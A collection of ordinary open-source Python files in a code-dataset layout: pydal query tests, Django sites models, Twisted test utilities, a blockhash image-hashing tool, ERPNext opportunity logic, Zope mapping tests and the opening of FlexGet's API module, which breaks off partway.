# returns a sheet as an array (rows) of arrays (columns)
def getSheet(self, name):
return self.SHEETS[name]
def getFirstSheet(self):
return next(iter(self.SHEETS.itervalues()))
| agpl-3.0 |
nonnib/eve-metrics | web2py/gluon/packages/dal/tests/smart_query.py | 27 | 12831 | from ._compat import unittest
from ._adapt import DEFAULT_URI, IS_GAE, IS_IMAP, drop
from pydal._compat import integer_types
from pydal import DAL, Field
from pydal.helpers.methods import smart_query
@unittest.skipIf(IS_IMAP, "Skip nosql")
class TestSmartQuery(unittest.TestCase):
def testRun(self):
db = DAL(DEFAULT_URI, check_reserved=['all'])
# -----------------------------------------------------------------------------
# Seems further imports are required for the commented field types below
# db.define_table('referred_table',
# Field('represent_field', 'string'))
# NOTE : Don't forget to uncomment the line # drop(db.referred_table) at the very end below
# if the above are uncommented
db.define_table('a_table',
Field('string_field', 'string'),
Field('text_field', 'text'),
Field('boolean_field', 'boolean'),
Field('integer_field', 'integer'),
Field('double_field', 'double'),
# Field('decimal_field', 'decimal'),
# Field('date_field', 'date'),
# Field('time_field', 'time'),
# Field('datetime_field', 'datetime'),
# Field('reference_field', 'reference referred_table'),
# Field('list_string_field', 'list:string'),
# Field('list_integer_field', 'list:integer'),
# Field('list_reference_field', 'list:reference referred_table')
)
fields = [db.a_table.id,
db.a_table.string_field,
db.a_table.text_field,
db.a_table.boolean_field,
db.a_table.integer_field,
db.a_table.double_field,
# db.a_table.decimal_field,
# db.a_table.date_field,
# db.a_table.time_field,
# db.a_table.reference_field,
# db.a_table.list_string_field,
# db.a_table.list_integer_field,
# db.a_table.list_reference_field
]
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Test with boolean field
# Operator under test
# operators = \
# [(' starts with ','startswith'),
# (' ends with ','endswith'),
# ('contains', 'N/A'),
# ('like', 'N/A')
# ]
#
#
keywords = 'a_table.boolean_field = True'
q = (db.a_table.boolean_field == True)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
if not IS_GAE:
# Test string field query
# starts with
keywords = 'a_table.string_field starts with "pydal"'
q = (db.a_table.string_field.startswith('pydal'))
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# ends with
keywords = 'a_table.string_field ends with "Rocks!!"'
q = (db.a_table.string_field.endswith('Rocks!!'))
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# contains
keywords = 'a_table.string_field contains "Rocks"'
q = (db.a_table.string_field.contains('Rocks'))
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# Don't work for some reason
# # like
# keywords = 'a_table.string_field like "%Rocks%"'
# q = (db.a_table.string_field.like('%Rocks%'))
# smart_q = smart_query(fields, keywords)
# self.assertTrue(smart_q == q)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Tests with integer field
# For generating these tests
# def generate_tests():
# operators = \
# [('=', '='),
# ('==', '='),
# (' is ','='),
# (' equal ', '='),
# (' equals ', '='),
# (' equal to ', '='),
# ('<>', '!='),
# (' not equal ', '!='),
# (' not equal to ', '!='),
# ('<', '<'),
# (' less than ', '<'),
# ('<=', '<='),
# ('=<', '<='),
# (' less or equal ', '<='),
# (' less or equal than ', '<='),
# (' equal or less ', '<='),
# (' equal or less than ', '<='),
# ('>', '>'),
# (' greater than ', '>'),
# ('=>', '>='),
# ('>=', '>='),
# (' greater or equal ', '>='),
# (' greater or equal than ', '>='),
# (' equal or greater ', '>='),
# (' equal or greater than ', '>=')] # JUST APPEND MORE OPERATORS HERE
#
# for op in operators:
# print """
# # {op}
# keywords = 'a_table.integer_field {test_op} 1'
# q = (db.a_table.integer_field {result_op} 1)
# smart_q = smart_query(fields, keywords)
# self.assertTrue(smart_q == q)""".format(op=op,
# test_op=op[0],
# result_op='==' if op[1] == '=' else op[1])
# ('=', '=')
keywords = 'a_table.integer_field = 1'
q = (db.a_table.integer_field == 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# ('==', '=')
keywords = 'a_table.integer_field == 1'
q = (db.a_table.integer_field == 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' is ','=')
keywords = 'a_table.integer_field is 1'
q = (db.a_table.integer_field == 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' equal ', '=')
keywords = 'a_table.integer_field equal 1'
q = (db.a_table.integer_field == 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' equals ', '=')
keywords = 'a_table.integer_field equals 1'
q = (db.a_table.integer_field == 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' equal to ', '=')
keywords = 'a_table.integer_field equal to 1'
q = (db.a_table.integer_field == 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# This one not allow over integer it seems
# # ('<>', '!=')
# keywords = 'a_table.integer_field <> 1'
# q = (db.a_table.integer_field != 1)
# smart_q = smart_query(fields, keywords)
# self.assertTrue(smart_q == q)
# (' not equal ', '!=')
keywords = 'a_table.integer_field not equal 1'
q = (db.a_table.integer_field != 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' not equal to ', '!=')
keywords = 'a_table.integer_field not equal to 1'
q = (db.a_table.integer_field != 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# ('<', '<')
keywords = 'a_table.integer_field < 1'
q = (db.a_table.integer_field < 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' less than ', '<')
keywords = 'a_table.integer_field less than 1'
q = (db.a_table.integer_field < 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# ('<=', '<=')
keywords = 'a_table.integer_field <= 1'
q = (db.a_table.integer_field <= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# This one is invalid, maybe we should remove it from smart_query
# # ('=<', '<=')
# keywords = 'a_table.integer_field =< 1'
# q = (db.a_table.integer_field <= 1)
# smart_q = smart_query(fields, keywords)
# self.assertTrue(smart_q == q)
# (' less or equal ', '<=')
keywords = 'a_table.integer_field less or equal 1'
q = (db.a_table.integer_field <= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' less or equal than ', '<=')
keywords = 'a_table.integer_field less or equal than 1'
q = (db.a_table.integer_field <= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' equal or less ', '<=')
keywords = 'a_table.integer_field equal or less 1'
q = (db.a_table.integer_field <= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' equal or less than ', '<=')
keywords = 'a_table.integer_field equal or less than 1'
q = (db.a_table.integer_field <= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# ('>', '>')
keywords = 'a_table.integer_field > 1'
q = (db.a_table.integer_field > 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' greater than ', '>')
keywords = 'a_table.integer_field greater than 1'
q = (db.a_table.integer_field > 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# This one is invalid, maybe we should remove it from smart_query
# # ('=>', '>=')
# keywords = 'a_table.integer_field => 1'
# q = (db.a_table.integer_field >= 1)
# smart_q = smart_query(fields, keywords)
# self.assertTrue(smart_q == q)
# ('>=', '>=')
keywords = 'a_table.integer_field >= 1'
q = (db.a_table.integer_field >= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' greater or equal ', '>=')
keywords = 'a_table.integer_field greater or equal 1'
q = (db.a_table.integer_field >= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' greater or equal than ', '>=')
keywords = 'a_table.integer_field greater or equal than 1'
q = (db.a_table.integer_field >= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' equal or greater ', '>=')
keywords = 'a_table.integer_field equal or greater 1'
q = (db.a_table.integer_field >= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# (' equal or greater than ', '>=')
keywords = 'a_table.integer_field equal or greater than 1'
q = (db.a_table.integer_field >= 1)
smart_q = smart_query(fields, keywords)
self.assertEqual(smart_q, q)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Belongs and not belongs
# NOTE : The below tests don't works
# Issue : https://github.com/web2py/pydal/issues/161
# (' in ', 'belongs') -> field.belongs(1, 2, 3)
# keywords = 'a_table.integer_field in "1, 2, 3"'
# q = (db.a_table.integer_field.belongs([1, 2, 3]))
# smart_q = smart_query(fields, keywords)
# self.assertEqual(smart_q, q)
# keywords = 'a_table.id in "1, 2, 3"'
# q = (db.a_table.id.belongs([1, 2, 3]))
# smart_q = smart_query(fields, keywords)
# self.assertEqual(smart_q, q)
#
# # (' not in ' , 'notbelongs'),
# keywords = 'a_table.integer_field not in "1, 2, 3"'
# q = (~db.a_table.id.belongs([1, 2, 3]))
# smart_q = smart_query(fields, keywords)
# self.assertTrue(smart_q == q)
# -----------------------------------------------------------------------------
# cleanup table
drop(db.a_table)
# drop(db.referred_table)
# -----------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| mit |
dcroc16/skunk_works | google_appengine/lib/django-1.4/django/contrib/sites/models.py | 387 | 2867 | from django.db import models
from django.utils.translation import ugettext_lazy as _
SITE_CACHE = {}
class SiteManager(models.Manager):
def get_current(self):
"""
Returns the current ``Site`` based on the SITE_ID in the
project's settings. The ``Site`` object is cached the first
time it's retrieved from the database.
"""
from django.conf import settings
try:
sid = settings.SITE_ID
except AttributeError:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("You're using the Django \"sites framework\" without having set the SITE_ID setting. Create a site in your database and set the SITE_ID setting to fix this error.")
try:
current_site = SITE_CACHE[sid]
except KeyError:
current_site = self.get(pk=sid)
SITE_CACHE[sid] = current_site
return current_site
def clear_cache(self):
"""Clears the ``Site`` object cache."""
global SITE_CACHE
SITE_CACHE = {}
class Site(models.Model):
domain = models.CharField(_('domain name'), max_length=100)
name = models.CharField(_('display name'), max_length=50)
objects = SiteManager()
class Meta:
db_table = 'django_site'
verbose_name = _('site')
verbose_name_plural = _('sites')
ordering = ('domain',)
def __unicode__(self):
return self.domain
def save(self, *args, **kwargs):
super(Site, self).save(*args, **kwargs)
# Cached information will likely be incorrect now.
if self.id in SITE_CACHE:
del SITE_CACHE[self.id]
def delete(self):
pk = self.pk
super(Site, self).delete()
try:
del SITE_CACHE[pk]
except KeyError:
pass
class RequestSite(object):
"""
A class that shares the primary interface of Site (i.e., it has
``domain`` and ``name`` attributes) but gets its data from a Django
HttpRequest object rather than from a database.
The save() and delete() methods raise NotImplementedError.
"""
def __init__(self, request):
self.domain = self.name = request.get_host()
def __unicode__(self):
return self.domain
def save(self, force_insert=False, force_update=False):
raise NotImplementedError('RequestSite cannot be saved.')
def delete(self):
raise NotImplementedError('RequestSite cannot be deleted.')
def get_current_site(request):
"""
Checks if contrib.sites is installed and returns either the current
``Site`` object or a ``RequestSite`` object based on the request.
"""
if Site._meta.installed:
current_site = Site.objects.get_current()
else:
current_site = RequestSite(request)
return current_site
| mit |
jxta/cc | vendor/Twisted-10.0.0/twisted/test/testutils.py | 110 | 1525 | from cStringIO import StringIO
from twisted.internet.protocol import FileWrapper
class IOPump:
"""Utility to pump data between clients and servers for protocol testing.
Perhaps this is a utility worthy of being in protocol.py?
"""
def __init__(self, client, server, clientIO, serverIO):
self.client = client
self.server = server
self.clientIO = clientIO
self.serverIO = serverIO
def flush(self):
"Pump until there is no more input or output."
while self.pump():
pass
def pump(self):
"""Move data back and forth.
Returns whether any data was moved.
"""
self.clientIO.seek(0)
self.serverIO.seek(0)
cData = self.clientIO.read()
sData = self.serverIO.read()
self.clientIO.seek(0)
self.serverIO.seek(0)
self.clientIO.truncate()
self.serverIO.truncate()
for byte in cData:
self.server.dataReceived(byte)
for byte in sData:
self.client.dataReceived(byte)
if cData or sData:
return 1
else:
return 0
def returnConnected(server, client):
"""Take two Protocol instances and connect them.
"""
cio = StringIO()
sio = StringIO()
client.makeConnection(FileWrapper(cio))
server.makeConnection(FileWrapper(sio))
pump = IOPump(client, server, cio, sio)
# Challenge-response authentication:
pump.flush()
# Uh...
pump.flush()
return pump
| apache-2.0 |
grevutiu-gabriel/blockhash-python | blockhash.py | 2 | 7314 | #! /usr/bin/env python
#
# Perceptual image hash calculation tool based on algorithm descibed in
# Block Mean Value Based Image Perceptual Hashing by Bian Yang, Fan Gu and Xiamu Niu
#
# Copyright 2014 Commons Machinery http://commonsmachinery.se/
# Distributed under an MIT license, please see LICENSE in the top dir.
import math
import argparse
import PIL.Image as Image
def median(data):
data = sorted(data)
length = len(data)
if length % 2 == 0:
return (data[length // 2] + data[length // 2 + 1]) / 2.0
return data[length // 2]
def total_value_rgba(im, data, x, y):
r, g, b, a = data[y * im.size[0] + x]
if a == 0:
return 765
else:
return r + g + b
def total_value_rgb(im, data, x, y):
r, g, b = data[y * im.size[0] + x]
return r + g + b
def bits_to_hexhash(bits):
return '{0:0={width}x}'.format(int(''.join([str(x) for x in bits]), 2), width = len(bits) // 4)
def blockhash_even(im, bits):
if im.mode == 'RGBA':
total_value = total_value_rgba
elif im.mode == 'RGB':
total_value = total_value_rgb
else:
raise RuntimeError('Unsupported image mode: {}'.format(im.mode))
data = im.getdata()
width, height = im.size
blocksize_x = width // bits
blocksize_y = height // bits
result = []
for y in range(bits):
for x in range(bits):
value = 0
for iy in range(blocksize_y):
for ix in range(blocksize_x):
cx = x * blocksize_x + ix
cy = y * blocksize_y + iy
value += total_value(im, data, cx, cy)
result.append(value)
m = []
for i in range(4):
m.append(median(result[i*bits*bits//4:i*bits*bits//4+bits*bits//4]))
for i in range(bits * bits):
if (((result[i] < m[0]) and (i < bits*bits/4)) or
((result[i] < m[1]) and (i >= bits*bits/4) and (i < bits*bits/2)) or
((result[i] < m[2]) and (i >= bits*bits/2) and (i < bits*bits/4+bits*bits/2)) or
((result[i] < m[3]) and (i >= bits*bits/2+bits*bits/4))):
result[i] = 0
else:
result[i] = 1
return bits_to_hexhash(result)
def blockhash(im, bits):
if im.mode == 'RGBA':
total_value = total_value_rgba
elif im.mode == 'RGB':
total_value = total_value_rgb
else:
raise RuntimeError('Unsupported image mode: {}'.format(im.mode))
data = im.getdata()
width, height = im.size
even_x = width % bits == 0
even_y = height % bits == 0
if even_x and even_y:
return blockhash_even(im, bits)
blocks = [[0 for col in range(bits)] for row in range(bits)]
block_width = float(width) / bits
block_height = float(height) / bits
for y in range(height):
if even_y:
# don't bother dividing y, if the size evenly divides by bits
block_top = block_bottom = int(y // block_height)
weight_top, weight_bottom = 1, 0
else:
y_frac, y_int = math.modf((y + 1) % block_height)
weight_top = (1 - y_frac)
weight_bottom = (y_frac)
# y_int will be 0 on bottom/right borders and on block boundaries
if y_int > 0 or (y + 1) == height:
block_top = block_bottom = int(y // block_height)
else:
block_top = int(y // block_height)
block_bottom = int(-(-y // block_height)) # int(math.ceil(float(y) / block_height))
for x in range(width):
value = total_value(im, data, x, y)
if even_x:
# don't bother dividing x, if the size evenly divides by bits
block_left = block_right = int(x // block_width)
weight_left, weight_right = 1, 0
else:
x_frac, x_int = math.modf((x + 1) % block_width)
weight_left = (1 - x_frac)
weight_right = (x_frac)
# x_int will be 0 on bottom/right borders and on block boundaries
if x_int > 0 or (x + 1) == width:
block_left = block_right = int(x // block_width)
else:
block_left = int(x // block_width)
block_right = int(-(-x // block_width)) # int(math.ceil(float(x) / block_width))
# add weighted pixel value to relevant blocks
blocks[block_top][block_left] += value * weight_top * weight_left
blocks[block_top][block_right] += value * weight_top * weight_right
blocks[block_bottom][block_left] += value * weight_bottom * weight_left
blocks[block_bottom][block_right] += value * weight_bottom * weight_right
result = [blocks[row][col] for row in range(bits) for col in range(bits)]
m = []
for i in range(4):
m.append(median(result[i*bits*bits//4:i*bits*bits//4+bits*bits//4]))
for i in range(bits * bits):
if (((result[i] < m[0]) and (i < bits*bits/4)) or
((result[i] < m[1]) and (i >= bits*bits/4) and (i < bits*bits/2)) or
((result[i] < m[2]) and (i >= bits*bits/2) and (i < bits*bits/4+bits*bits/2)) or
((result[i] < m[3]) and (i >= bits*bits/2+bits*bits/4))):
result[i] = 0
else:
result[i] = 1
return bits_to_hexhash(result)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--quick', type=bool, default=False,
help='Use quick hashing method. Default: False')
parser.add_argument('--bits', type=int, default=16,
help='Create hash of size N^2 bits. Default: 16')
parser.add_argument('--size',
help='Resize image to specified size before hashing, e.g. 256x256')
parser.add_argument('--interpolation', type=int, default=1, choices=[1, 2, 3, 4],
help='Interpolation method: 1 - nearest neightbor, 2 - bilinear, 3 - bicubic, 4 - antialias. Default: 1')
parser.add_argument('--debug', action='store_true',
help='Print hashes as 2D maps (for debugging)')
parser.add_argument('filenames', nargs='+')
args = parser.parse_args()
if args.interpolation == 1:
interpolation = Image.NEAREST
elif args.interpolation == 2:
interpolation = Image.BILINEAR
elif args.interpolation == 3:
interpolation = Image.BICUBIC
elif args.interpolation == 4:
interpolation = Image.ANTIALIAS
if args.quick:
method = blockhash_even
else:
method = blockhash
for fn in args.filenames:
im = Image.open(fn)
# convert indexed/grayscale images to RGB
if im.mode == '1' or im.mode == 'L' or im.mode == 'P':
im = im.convert('RGB')
elif im.mode == 'LA':
im = im.convert('RGBA')
if args.size:
size = args.size.split('x')
size = (int(size[0]), int(size[1]))
im = im.resize(size, interpolation)
hash = method(im, args.bits)
print('{} {}'.format(fn, hash))
if args.debug:
bin_hash = bin(int(hash, 16))[2:]
map = [bin_hash[i:i+args.bits] for i in range(0, len(bin_hash), args.bits)]
print("")
print("\n".join(map))
print("")
| mit |
anandpdoshi/erpnext | erpnext/crm/doctype/opportunity/opportunity.py | 1 | 7868 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, json
from frappe.utils import cstr, cint, get_fullname
from frappe import msgprint, _
from frappe.model.mapper import get_mapped_doc
from erpnext.setup.utils import get_exchange_rate
from erpnext.utilities.transaction_base import TransactionBase
from erpnext.accounts.party import get_party_account_currency
subject_field = "title"
sender_field = "contact_email"
class Opportunity(TransactionBase):
def after_insert(self):
if self.lead:
frappe.get_doc("Lead", self.lead).set_status(update=True)
def validate(self):
self._prev = frappe._dict({
"contact_date": frappe.db.get_value("Opportunity", self.name, "contact_date") if \
(not cint(self.get("__islocal"))) else None,
"contact_by": frappe.db.get_value("Opportunity", self.name, "contact_by") if \
(not cint(self.get("__islocal"))) else None,
})
self.make_new_lead_if_required()
if not self.enquiry_from:
frappe.throw(_("Opportunity From field is mandatory"))
self.set_status()
self.validate_item_details()
self.validate_uom_is_integer("uom", "qty")
self.validate_lead_cust()
self.validate_cust_name()
if not self.title:
self.title = self.customer_name
def make_new_lead_if_required(self):
"""Set lead against new opportunity"""
if not (self.lead or self.customer):
lead_name = frappe.db.get_value("Lead", {"email_id": self.contact_email})
if not lead_name:
sender_name = get_fullname(self.contact_email)
if sender_name == self.contact_email:
sender_name = None
if not sender_name and self.contact_email.index('@'):
email_name = self.contact_email[0:self.contact_email.index('@')]
email_split = email_name.split('.')
for s in email_split:
sender_name += s.capitalize() + ' '
lead = frappe.get_doc({
"doctype": "Lead",
"email_id": self.contact_email,
"lead_name": sender_name
})
lead.insert(ignore_permissions=True)
lead_name = lead.name
self.enquiry_from = "Lead"
self.lead = lead_name
def declare_enquiry_lost(self,arg):
if not self.has_quotation():
frappe.db.set(self, 'status', 'Lost')
frappe.db.set(self, 'order_lost_reason', arg)
else:
frappe.throw(_("Cannot declare as lost, because Quotation has been made."))
def on_trash(self):
self.delete_events()
def has_quotation(self):
return frappe.db.get_value("Quotation Item", {"prevdoc_docname": self.name, "docstatus": 1})
def has_ordered_quotation(self):
return frappe.db.sql("""select q.name from `tabQuotation` q, `tabQuotation Item` qi
where q.name = qi.parent and q.docstatus=1 and qi.prevdoc_docname =%s and q.status = 'Ordered'""", self.name)
def validate_cust_name(self):
if self.customer:
self.customer_name = frappe.db.get_value("Customer", self.customer, "customer_name")
elif self.lead:
lead_name, company_name = frappe.db.get_value("Lead", self.lead, ["lead_name", "company_name"])
self.customer_name = company_name or lead_name
def get_cust_address(self,name):
details = frappe.db.sql("""select customer_name, address, territory, customer_group
from `tabCustomer` where name = %s and docstatus != 2""", (name), as_dict = 1)
if details:
ret = {
'customer_name': details and details[0]['customer_name'] or '',
'address' : details and details[0]['address'] or '',
'territory' : details and details[0]['territory'] or '',
'customer_group' : details and details[0]['customer_group'] or ''
}
# ********** get primary contact details (this is done separately coz. , in case there is no primary contact thn it would not be able to fetch customer details in case of join query)
contact_det = frappe.db.sql("""select contact_name, contact_no, email_id
from `tabContact` where customer = %s and is_customer = 1
and is_primary_contact = 'Yes' and docstatus != 2""", name, as_dict = 1)
ret['contact_person'] = contact_det and contact_det[0]['contact_name'] or ''
ret['contact_no'] = contact_det and contact_det[0]['contact_no'] or ''
ret['email_id'] = contact_det and contact_det[0]['email_id'] or ''
return ret
else:
frappe.throw(_("Customer {0} does not exist").format(name), frappe.DoesNotExistError)
def on_update(self):
self.add_calendar_event()
def add_calendar_event(self, opts=None, force=False):
if not opts:
opts = frappe._dict()
opts.description = ""
opts.contact_date = self.contact_date
if self.customer:
if self.contact_person:
opts.description = 'Contact '+cstr(self.contact_person)
else:
opts.description = 'Contact customer '+cstr(self.customer)
elif self.lead:
if self.contact_display:
opts.description = 'Contact '+cstr(self.contact_display)
else:
opts.description = 'Contact lead '+cstr(self.lead)
opts.subject = opts.description
opts.description += '. By : ' + cstr(self.contact_by)
if self.to_discuss:
opts.description += ' To Discuss : ' + cstr(self.to_discuss)
super(Opportunity, self).add_calendar_event(opts, force)
def validate_item_details(self):
if not self.get('items'):
return
# set missing values
item_fields = ("item_name", "description", "item_group", "brand")
for d in self.items:
if not d.item_code:
continue
item = frappe.db.get_value("Item", d.item_code, item_fields, as_dict=True)
for key in item_fields:
if not d.get(key): d.set(key, item.get(key))
def validate_lead_cust(self):
if self.enquiry_from == 'Lead':
if not self.lead:
frappe.throw(_("Lead must be set if Opportunity is made from Lead"))
else:
self.customer = None
elif self.enquiry_from == 'Customer':
if not self.customer:
msgprint("Customer is mandatory if 'Opportunity From' is selected as Customer", raise_exception=1)
else:
self.lead = None
@frappe.whitelist()
def get_item_details(item_code):
item = frappe.db.sql("""select item_name, stock_uom, image, description, item_group, brand
from `tabItem` where name = %s""", item_code, as_dict=1)
return {
'item_name': item and item[0]['item_name'] or '',
'uom': item and item[0]['stock_uom'] or '',
'description': item and item[0]['description'] or '',
'image': item and item[0]['image'] or '',
'item_group': item and item[0]['item_group'] or '',
'brand': item and item[0]['brand'] or ''
}
@frappe.whitelist()
def make_quotation(source_name, target_doc=None):
def set_missing_values(source, target):
quotation = frappe.get_doc(target)
company_currency = frappe.db.get_value("Company", quotation.company, "default_currency")
party_account_currency = get_party_account_currency("Customer", quotation.customer,
quotation.company) if quotation.customer else company_currency
quotation.currency = party_account_currency or company_currency
if company_currency == quotation.currency:
exchange_rate = 1
else:
exchange_rate = get_exchange_rate(quotation.currency, company_currency)
quotation.conversion_rate = exchange_rate
quotation.run_method("set_missing_values")
quotation.run_method("calculate_taxes_and_totals")
doclist = get_mapped_doc("Opportunity", source_name, {
"Opportunity": {
"doctype": "Quotation",
"field_map": {
"enquiry_from": "quotation_to",
"enquiry_type": "order_type",
"name": "enq_no",
}
},
"Opportunity Item": {
"doctype": "Quotation Item",
"field_map": {
"parent": "prevdoc_docname",
"parenttype": "prevdoc_doctype",
"uom": "stock_uom"
},
"add_if_empty": True
}
}, target_doc, set_missing_values)
return doclist
@frappe.whitelist()
def set_multiple_status(names, status):
names = json.loads(names)
for name in names:
opp = frappe.get_doc("Opportunity", name)
opp.status = status
opp.save()
| agpl-3.0 |
dya2/python-for-android | python-modules/zope/zope/interface/common/tests/basemapping.py | 50 | 3973 | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Base Mapping tests
$Id: basemapping.py 110736 2010-04-11 10:59:30Z regebro $
"""
from operator import __getitem__
def testIReadMapping(self, inst, state, absent):
for key in state:
self.assertEqual(inst[key], state[key])
self.assertEqual(inst.get(key, None), state[key])
self.failUnless(key in inst)
for key in absent:
self.assertEqual(inst.get(key, None), None)
self.assertEqual(inst.get(key), None)
self.assertEqual(inst.get(key, self), self)
self.assertRaises(KeyError, __getitem__, inst, key)
def test_keys(self, inst, state):
# Return the keys of the mapping object
inst_keys = list(inst.keys()); inst_keys.sort()
state_keys = list(state.keys()) ; state_keys.sort()
self.assertEqual(inst_keys, state_keys)
def test_iter(self, inst, state):
# Return the keys of the mapping object
inst_keys = list(inst); inst_keys.sort()
state_keys = list(state.keys()) ; state_keys.sort()
self.assertEqual(inst_keys, state_keys)
def test_values(self, inst, state):
# Return the values of the mapping object
inst_values = list(inst.values()); inst_values.sort()
state_values = list(state.values()) ; state_values.sort()
self.assertEqual(inst_values, state_values)
def test_items(self, inst, state):
# Return the items of the mapping object
inst_items = list(inst.items()); inst_items.sort()
state_items = list(state.items()) ; state_items.sort()
self.assertEqual(inst_items, state_items)
def test___len__(self, inst, state):
# Return the number of items
self.assertEqual(len(inst), len(state))
def testIEnumerableMapping(self, inst, state):
test_keys(self, inst, state)
test_items(self, inst, state)
test_values(self, inst, state)
test___len__(self, inst, state)
class BaseTestIReadMapping(object):
def testIReadMapping(self):
inst = self._IReadMapping__sample()
state = self._IReadMapping__stateDict()
absent = self._IReadMapping__absentKeys()
testIReadMapping(self, inst, state, absent)
class BaseTestIEnumerableMapping(BaseTestIReadMapping):
# Mapping objects whose items can be enumerated
def test_keys(self):
# Return the keys of the mapping object
inst = self._IEnumerableMapping__sample()
state = self._IEnumerableMapping__stateDict()
test_keys(self, inst, state)
def test_values(self):
# Return the values of the mapping object
inst = self._IEnumerableMapping__sample()
state = self._IEnumerableMapping__stateDict()
test_values(self, inst, state)
def test_items(self):
# Return the items of the mapping object
inst = self._IEnumerableMapping__sample()
state = self._IEnumerableMapping__stateDict()
test_items(self, inst, state)
def test___len__(self):
# Return the number of items
inst = self._IEnumerableMapping__sample()
state = self._IEnumerableMapping__stateDict()
test___len__(self, inst, state)
def _IReadMapping__stateDict(self):
return self._IEnumerableMapping__stateDict()
def _IReadMapping__sample(self):
return self._IEnumerableMapping__sample()
def _IReadMapping__absentKeys(self):
return self._IEnumerableMapping__absentKeys()
| apache-2.0 |
VisTrails/VisTrails | vistrails/db/versions/v0_8_1/__init__.py | 2 | 1965 | ###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from __future__ import division
version = '0.8.1'
| bsd-3-clause |
malkavi/Flexget | flexget/api/app.py | 1 | 14373 | import json
import os
import re
from collections import deque
from functools import partial, wraps
from flask import Flask, jsonify, make_response, request
from flask_compress import Compress
from flask_cors import CORS
from flask_restplus import Api as RestPlusAPI
from flask_restplus import Resource
from jsonschema import RefResolutionError
from loguru import logger
from werkzeug.http import generate_etag
from flexget import manager
from flexget.config_schema import format_checker, process_config
from flexget.utils.database import with_session
from flexget.webserver import User
from . import __path__
__version__ = '1.7.1'
logger = logger.bind(name='api')
class APIClient:
"""
This is an client which can be used as a more pythonic interface to the rest api.
It skips http, and is only usable from within the running flexget process.
"""
def __init__(self):
self.app = api_app.test_client()
def __getattr__(self, item):
return APIEndpoint('/api/' + item, self.get_endpoint)
def get_endpoint(self, url, data=None, method=None):
if method is None:
method = 'POST' if data is not None else 'GET'
auth_header = dict(Authorization='Token %s' % api_key())
